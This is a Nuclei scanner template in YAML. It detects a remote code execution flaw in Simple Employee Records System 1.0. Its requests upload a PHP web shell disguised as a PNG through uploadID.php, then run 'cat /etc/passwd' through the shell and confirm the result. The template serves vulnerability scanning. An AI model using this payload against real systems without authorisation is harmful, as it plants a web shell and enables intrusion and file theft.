nuclei-templates/vulnerabilities/other/simple-employee-rce.yaml

46 lines
1.1 KiB
YAML

id: simple-employee-rce
info:
name: Simple Employee Records System 1.0 RCE
author: pikpikcu
severity: critical
reference: https://www.exploit-db.com/exploits/49596
tags: rce
requests:
- raw:
- |
POST /dashboard/uploadID.php HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337
-----------------------------5825462663702204104870787337
Content-Disposition: form-data; name="employee_ID"; filename="poc.php"
Content-Type: image/png
<?php
$cmd=$_GET['cmd'];
system($cmd);
?>
-----------------------------5825462663702204104870787337--
- |
GET /uploads/employees_ids/{{endpoint}}?cmd=cat%20/etc/passwd HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: endpoint
part: body
internal: true
regex:
- '(?:[a-zA-Z0-9+\/])*_poc.php'
matchers:
- type: regex
regex:
- "root:.*:0:0"
condition: and
part: body